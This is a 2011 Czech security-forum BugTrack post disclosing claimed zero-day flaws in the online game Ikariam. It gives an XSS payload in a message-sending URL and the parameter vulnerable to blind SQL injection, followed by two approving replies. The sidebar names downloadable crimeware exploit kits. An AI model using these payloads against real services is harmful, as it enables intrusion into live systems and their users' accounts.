Ikariam - multiple vulnerabilities

BugTrack

Ikariam - multiple vulnerabilities

Hi there,

as I promised im gonna release my 0day for known on-line game ikariam.

1. XSS

screenshot: [link]

url: /index.php?action=Messages&function=sen
d&receiverId=112&msgType=50&con
tent="><BODY ONLOAD=alert(3)>

2. Blind SQLi

screenshots:
[link]

Can you find difference? :P

URL: index.php?action=Messages&function=send
&receiverId=406&msgType=50<SQLi&
gt;&content=whatever,

Peace out.
(odpovědět)

RnmX | 193.200.150.*

13.8.2011 18:38

re: Ikariam - multiple vulnerabilities

Nice found man.... Great post thank you
(odpovědět)

Reflex | 213.81.161.*

13.8.2011 22:04

Zpět


	.Infobox Nejnovější: Články: Zabraňte zneužití svých dat Skrytí oprávnění v Androidu (CVE-2019-2089) Studie: Třetina českých e-shopů má bezpečnostní problémy! Aktuality: Pozvánka na OWASP meetup v Brně Co nyní dělají zakladatelé hacking portálů? Pozvánka na OWASP Czech chapter meeting IT Právo: Jak poslat Email, aby se nejednalo o spam? Konverzace na ICQ jako důkaz. Uveřejnění cizích fotografií Soubory: Phoenix 2.5 Crimeware Exploit Kit Crimepack 3.1.3 BugTrack: SQLi na listyprahy1.cz SQLi na Florenc SQLi na kacov.cz HackForum: Sciolink a pořizování screenshotu obrazovky Dark Web - zkušenosti Detekce HW keyloggeru Další služby: BBC: Supported Tags RSS: RSS Feeds v2.0 IRC: #soom (irc.2600.net) Na SOOM.cz je: Článků: 991 Komentářů: 14 254 Aktualit: 1 862 Souborů: 151 WebForum: 49 354 Hardware: 38 Diskuze: 20 178 BugTrack: 4 414 Reg. uživatelů: 15 832 A proběhlo: Zobraz. článků: 17 462 534 Staženo souborů: 1 370 979 Staženo dat: 882 830 MB Přístupy (hits): 206 945 639

Ikariam - multiple vulnerabilities

BugTrack

Hacking keywords